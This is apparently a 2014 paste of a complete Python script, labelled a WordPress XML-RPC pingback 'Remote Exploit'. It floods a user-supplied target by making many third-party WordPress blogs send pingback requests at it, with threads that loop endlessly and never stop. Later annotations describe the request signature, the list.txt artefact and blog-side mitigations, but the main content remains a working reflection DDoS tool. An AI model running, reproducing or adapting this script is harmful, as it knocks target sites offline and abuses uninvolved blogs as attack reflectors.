XMLRPC DDoS WordPress PingBack API Remote Exploit

a guest
Apr 25th, 2014
  1. import sys, socket, threading, time, os
  2.  
  # Module-level state shared by every PingBack thread: Lock is taken in run()
  # only around the start-up print, and N is the index into the blog list that
  # each thread's loop reads and advances.
  3. Lock = threading.Lock()
  4. N = 0
  5. class PingBack(threading.Thread):
         # Worker thread for an XML-RPC pingback reflection flood.
         #
         # Each thread walks the shared blog list and POSTs a `pingback.ping`
         # call to every blog's /xmlrpc.php, passing `url` as the first
         # (source) parameter and the blog post as the second (target).
         # A WordPress site that still honours pingbacks responds by fetching
         # the source URL itself, so the load on `url` arrives from the listed
         # third-party blogs rather than from the host running this script.
         #
         # Detection on a blog being used as a reflector (all values are taken
         # from the request string built in run()):
         #   - POST to /xmlrpc.php over HTTP/1.0 with the request line carrying
         #     the absolute blog URL instead of a bare path
         #   - User-Agent: "Internal Wordpress RPC connection"
         #   - methodName pingback.ping with the same source URL repeated
         #   - header block ended by a mixed "\r\n\n" sequence
         # Mitigation on the blog side: stop exposing pingback.ping (WordPress
         # `xmlrpc_methods` filter) or block / rate-limit POSTs to /xmlrpc.php
         # at the web server or WAF.
         # NOTE(review): on the flooded site the reflected requests normally
         # carry a User-Agent beginning "WordPress/" - confirm against logs
         # before keying a filter on it.
  6.     blog = None
  7.    
  8.     def __init__(self, url, number, lista):
             # url: address placed in the pingback source parameter.
             # number: thread label used only in console output.
             # lista: list of blog post URLs shared (not copied) by all threads.
  9.         threading.Thread.__init__(self)
  10.         self.url = url
  11.         self.number = number
  12.         self.lista = lista
  13.         self.blog = None
  14.        
  15.     def run(self):
              # Thread body: announce the thread, wait two seconds, then loop
              # forever sending one pingback request per iteration. There is no
              # exit condition in this method.
  16.         global N
  17.         Lock.acquire()
  18.         print ("Starting thread #%3d" % self.number)
  19.         Lock.release()
  20.         time.sleep(2)
  21.         while True:
                  # Pick the next blog using the shared index and wrap to 0 at
                  # the end of the list, so the list is cycled indefinitely.
  22.             self.blog = self.lista[N]
  23.             N += 1
  24.             if N > (len(self.lista) - 1):
  25.                 N = 0
  26.            
  27.             try:
                      # This copy of the XML body is used only to compute the
                      # Content-Length value; the body actually sent is the
                      # one embedded in `request` below.
  28.                 function_pingback = "<?xml version='1.0' encoding='iso-8859-1'?><methodCall><methodName>pingback.ping</methodName><params><param><value><string>%s</string></value></param><param><value><string>%s</string></value></param></params></methodCall>" % (self.url, self.blog)
  29.                 request_lenght = len(function_pingback)
                      # Strip the "?p=" query to get the blog base URL, then
                      # take the host part after "http://". An entry without
                      # "http://" raises IndexError, which the bare except
                      # below reports as a refused connection.
  30.                 self.blog_cleaned = self.blog.split("?p=")[0]
  31.                 self.blog_cleaned1 = self.blog_cleaned.split("http://")[1].split("/")[0]
                      # Hand-built HTTP/1.0 request; the fixed User-Agent and
                      # header layout here are the log/IDS signature described
                      # in the class comment.
  32.                 request = "POST %s/xmlrpc.php HTTP/1.0\r\nHost: %s\r\nUser-Agent: Internal Wordpress RPC connection\r\nContent-Type: text/xml\r\nContent-Length: %s\r\n\n<?xml version=\"1.0\" encoding=\"iso-8859-1\"?><methodCall><methodName>pingback.ping</methodName><params><param><value><string>%s</string></value></param><param><value><string>%s</string></value></param></params></methodCall>\r\n\r\n" % (self.blog_cleaned, self.blog_cleaned1, request_lenght, self.url, self.blog)
  33.              
                      # Plain TCP to port 80 of the blog host. The response is
                      # never read and the socket is never closed in this
                      # method.
  34.                 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM, socket.SOL_TCP)
  35.                 s.connect((self.blog_cleaned1, 80))
  36.                 s.send(request.encode())
  37.                 print ("Thread %3d | %2d | Blog %s" % (self.number, N, self.blog_cleaned1))
  38.             except:
                      # Bare except: any failure (parsing, DNS, connect, send)
                      # is printed as "Connection refused!!" and the loop
                      # continues with the next blog.
  39.                 print ("Thread %3d | %2d | Connection refused!!" % (self.number, N))
  40.  
  41. def title():
          # Set the console window title and text colour through os.system and
          # print the banner. `title` and `color` are cmd.exe built-ins, so
          # the script appears to be written for a Windows console.
          # The banner records a date, the Python version and two author
          # handles, which may help attribute copies of this script.
  42.     os.system("title ...:: XMLRPC PingBack DDoS ::... ")
  43.     os.system("color a")
  44.     print ("""-------------------------------------------------------------------------\n
  45. \tXML-RPC PingBack API Remote DDoS
  46. \tDate : 20/04/2014
  47. \tPython 3.3.3
  48. \tPython version coded by : Xordas94 && Sikh887\n
  49. --------------------------------------------------------------------------\n\n""")
  50.  
  51.    
  52. def main():
          # Interactive entry point: show the banner, load the blog list from
          # list.txt in the current working directory, prompt for a thread
          # count and a URL, then start that many PingBack threads.
          # Host artefact for responders: a list.txt of blog post URLs sitting
          # in the directory the script was run from.
  53.     title()
  54.     try:
              # Lines are appended exactly as read, and the file handle is
              # never closed explicitly.
  55.         in_file = open("list.txt", "r")
  56.         lista = []
  57.         for i in in_file:
  58.             lista.append(i)
  59.     except:
              # Bare except: every failure while opening or reading is
              # reported as a missing list.txt, then the process exits with
              # status 0 after the cmd.exe `pause` built-in.
  60.         print ("I can't find list.txt. To run the program you need it")
  61.         os.system("pause")
  62.         sys.exit(0)
  63.     num_thread = int(input("Number of thread: "))
  64.     url = str(input("Target: "))
  65.     print("\n###############################################")
          # Threads are started with the default daemon=False and are never
          # joined; as each run() loops forever, the process keeps running
          # after main() returns.
  66.     for i in range(num_thread):
  67.         PingBack(url, i+1, lista).start()
  68.     print("###############################################\n")
  69.  
  # Run main() only when the file is executed as a script, not on import.
  70. if __name__ == "__main__":
  71.     main()